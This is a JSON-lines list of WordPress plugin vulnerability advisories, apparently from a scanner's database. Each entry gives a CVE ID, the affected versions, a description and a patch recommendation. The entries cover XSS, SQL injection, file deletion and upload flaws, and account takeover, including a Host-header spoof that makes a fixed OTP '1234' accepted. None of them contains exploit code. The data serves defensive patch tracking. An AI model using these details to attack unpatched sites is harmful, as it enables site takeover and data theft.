{"CVE_ID":"CVE-2024-13553","slug":"sms-alert","versionImpact":"3.7.9","versionEndExcluding":"3.8.0","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.7.9. This is due to the plugin using the Host header to determine if the plugin is in a playground environment. This makes it possible for unauthenticated attackers to spoof the Host header to make the OTP code \"1234\" and authenticate as any user, including administrators.","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227241%40sms-alert&new=3227241%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227241%40sms-alert&new=3227241%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248017%40sms-alert&new=3248017%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248017%40sms-alert&new=3248017%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e444a30-11c5-4219-b4fe-635084cbac3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e444a30-11c5-4219-b4fe-635084cbac3a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50879","slug":"full-site-editing","versionEndExcluding":"3.79150","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic WordPress.Com Editing Toolkit allows Stored XSS.This issue affects WordPress.Com Editing Toolkit: from n\/a through 3.78784.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/full-site-editing\\\/wordpress-wordpress-com-editing-toolkit-plugin-3-78784-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/full-site-editing\\\/wordpress-wordpress-com-editing-toolkit-plugin-3-78784-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34561","slug":"real3d-flipbook-lite","versionImpact":"3.71","versionEndExcluding":"3.72","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative interactive media 3D FlipBook, PDF Viewer, PDF Embedder \u2013 Real 3D FlipBook WordPress Plugin allows Stored XSS.This issue affects 3D FlipBook, PDF Viewer, PDF Embedder \u2013 Real 3D FlipBook WordPress Plugin: from n\/a through 3.71.\n\n","recommendation":"Update to version 3.72, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/real3d-flipbook-lite\\\/wordpress-real3d-flipbook-pdf-viewer-lite-plugin-3-71-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/real3d-flipbook-lite\\\/wordpress-real3d-flipbook-pdf-viewer-lite-plugin-3-71-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0321","slug":"elementskit","versionImpact":"3.7.8","versionEndExcluding":"3.7.9","description":"The ElementsKit Pro plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 3.7.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/204cfe20-9df1-4f6c-a38c-a21b43dde385?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/204cfe20-9df1-4f6c-a38c-a21b43dde385?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5343","slug":"ays-popup-box","versionImpact":"3.7.8","versionEndExcluding":"3.7.9","description":"The Popup box WordPress plugin before 3.7.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 3.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74613b38-48f2-43d5-bae5-25c89ba7db6e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74613b38-48f2-43d5-bae5-25c89ba7db6e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4726","slug":"ultimate-dashboard","versionImpact":"3.7.7","versionEndExcluding":"3.7.8","description":"The Ultimate Dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.7.7. due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cce1fc-a27f-4842-b1a2-2c53857add4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cce1fc-a27f-4842-b1a2-2c53857add4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2991103%40ultimate-dashboard%2Ftrunk&old=2958955%40ultimate-dashboard%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2991103%40ultimate-dashboard%2Ftrunk&old=2958955%40ultimate-dashboard%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11725","slug":"sms-alert","versionImpact":"3.7.6","versionEndExcluding":"3.7.7","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the updateWcWarrantySettings() function in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. Please note this requires the woocommerce-warranty plugin to be installed in order to be exploited.","recommendation":"Update to version 3.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198056\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198056\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197777%40sms-alert&new=3197777%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197777%40sms-alert&new=3197777%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199795%40sms-alert&new=3199795%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199795%40sms-alert&new=3199795%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207391%40sms-alert&new=3207391%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207391%40sms-alert&new=3207391%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33517dba-78ac-4391-a55e-d1f13801b212?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33517dba-78ac-4391-a55e-d1f13801b212?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2812","slug":"ultimate-dashboard","versionEndExcluding":"3.7.6","description":"The Ultimate Dashboard WordPress plugin before 3.7.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7de4c313-359e-4450-85f5-d29f3c2f046a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7de4c313-359e-4450-85f5-d29f3c2f046a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5857","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor \u2013 Funnelforms Free plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the af2_handel_file_remove AJAX action in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to delete arbitrary media files.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cd0e015-abf2-4905-8b42-46b685be2c74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cd0e015-abf2-4905-8b42-46b685be2c74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7447","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor \u2013 Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'fnsf_af2_handel_file_upload' function in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to upload arbitrary media to the site, even if no forms exist.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9871f683-136e-45b5-90fb-a373a771014b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9871f683-136e-45b5-90fb-a373a771014b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php#L2577\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php#L2577\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6312","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 3.7.3.2 via the 'af2DeleteFontFile' function. This is due to the plugin not properly validating a file or its path prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e815531-f966-44a1-a037-8077a40c83b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e815531-f966-44a1-a037-8077a40c83b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6311","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'af2_add_font' function in all versions up to, and including, 3.7.3.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbd42fc4-ab4a-4053-b765-18272eacd2bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbd42fc4-ab4a-4053-b765-18272eacd2bc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L50\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2262","slug":"gs-logo-slider","versionImpact":"3.7.3","versionEndExcluding":"3.7.4","description":"The The Logo Slider \u2013 Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.7.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256441\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256441\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7cc2d2-8de4-453b-b4dc-48f75b151078?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7cc2d2-8de4-453b-b4dc-48f75b151078?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5864","slug":"easy-affiliate-links","versionImpact":"3.7.3","versionEndExcluding":"3.7.4","description":"The Easy Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eafl_reset_settings AJAX action in all versions up to, and including, 3.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's settings.","recommendation":"Update to version 3.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a4c656-8df8-44ce-884f-dd502d17f594?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a4c656-8df8-44ce-884f-dd502d17f594?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106718\\\/easy-affiliate-links\\\/trunk\\\/includes\\\/admin\\\/class-eafl-tools-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106718\\\/easy-affiliate-links\\\/trunk\\\/includes\\\/admin\\\/class-eafl-tools-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7082","slug":"wp-all-import","versionEndExcluding":"3.7.3","description":"The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allows high privilege users such as administrator to upload an executable file type leading to remote code execution.","recommendation":"Update to version 3.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f947305-7a72-4c59-9ae8-193f437fd04e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f947305-7a72-4c59-9ae8-193f437fd04e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10125","slug":"wp-ultimate-csv-importer","versionImpact":"3.7.2","versionEndExcluding":"3.7.3","description":"A vulnerability classified as problematic has been found in WP Ultimate CSV Importer Plugin 3.7.2 on WordPress. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 3.7.3 is able to address this issue. The identifier of the patch is 13c30af721d3f989caac72dd0f56cf0dc40fad7e. It is recommended to upgrade the affected component. The identifier VDB-241317 was assigned to this vulnerability.","recommendation":"Update to version 3.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/releases\\\/tag\\\/3.7.3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/releases\\\/tag\\\/3.7.3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.241317\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.241317\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/commit\\\/13c30af721d3f989caac72dd0f56cf0dc40fad7e\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/commit\\\/13c30af721d3f989caac72dd0f56cf0dc40fad7e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241317\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241317\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2023","slug":"custom-404-pro","versionEndExcluding":"3.7.3","description":"The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8859843a-a8c2-4f7a-8372-67049d6ea317\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8859843a-a8c2-4f7a-8372-67049d6ea317\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125099","slug":"i-recommend-this","versionImpact":"3.7.2","versionEndExcluding":"3.7.3","description":"A vulnerability has been found in I Recommend This Plugin up to 3.7.2 on WordPress and classified as critical. Affected by this vulnerability is an unknown functionality of the file dot-irecommendthis.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 3.7.3 is able to address this issue. The name of the patch is 058b3ef5c7577bf557557904a53ecc8599b13649. It is recommended to upgrade the affected component. The identifier VDB-226309 was assigned to this vulnerability.","recommendation":"Update to version 3.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/releases\\\/tag\\\/3.7.3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/releases\\\/tag\\\/3.7.3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226309\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226309\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.226309\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.226309\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/commit\\\/058b3ef5c7577bf557557904a53ecc8599b13649\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/commit\\\/058b3ef5c7577bf557557904a53ecc8599b13649\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4390","slug":"ays-popup-box","versionEndExcluding":"3.7.2","description":"The Popup box WordPress plugin before 3.7.2 does not sanitize and escape some Popup fields, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9fd2eb81-185d-4d42-8acf-925664b7cb2f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9fd2eb81-185d-4d42-8acf-925664b7cb2f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0685","slug":"ninja-forms","versionImpact":"3.7.1","versionEndExcluding":"3.7.2","description":"The Ninja Forms Contact Form \u2013 The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.","recommendation":"Update to version 3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028929\\\/ninja-forms\\\/trunk\\\/includes\\\/Admin\\\/UserDataRequests.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028929\\\/ninja-forms\\\/trunk\\\/includes\\\/Admin\\\/UserDataRequests.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4446","slug":"content-views-query-and-display-post-page","versionImpact":"3.7.1","versionEndExcluding":"3.7.2","description":"The Content Views \u2013 Post Grid & Filter, Recent Posts, Category Posts, & More (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018pagingType\u2019 parameter in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65504747-7f1b-43f9-be4d-48b9547e7c45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65504747-7f1b-43f9-be4d-48b9547e7c45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/content-views-query-and-display-post-page\\\/tags\\\/3.7.1\\\/includes\\\/html.php#L803\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/content-views-query-and-display-post-page\\\/tags\\\/3.7.1\\\/includes\\\/html.php#L803\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50828","slug":"ultimate-dashboard","versionEndExcluding":"3.7.12","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Vongries Ultimate Dashboard \u2013 Custom WordPress Dashboard allows Stored XSS.This issue affects Ultimate Dashboard \u2013 Custom WordPress Dashboard: from n\/a through 3.7.11.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-dashboard\\\/wordpress-ultimate-dashboard-plugin-3-7-11-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-dashboard\\\/wordpress-ultimate-dashboard-plugin-3-7-11-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9233","slug":"gs-logo-slider","versionImpact":"3.7.0","versionEndExcluding":"3.7.1","description":"The Logo Slider  WordPress plugin before 3.7.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a466cea4-0ae5-44a1-9e12-bd5dbecde2f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a466cea4-0ae5-44a1-9e12-bd5dbecde2f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
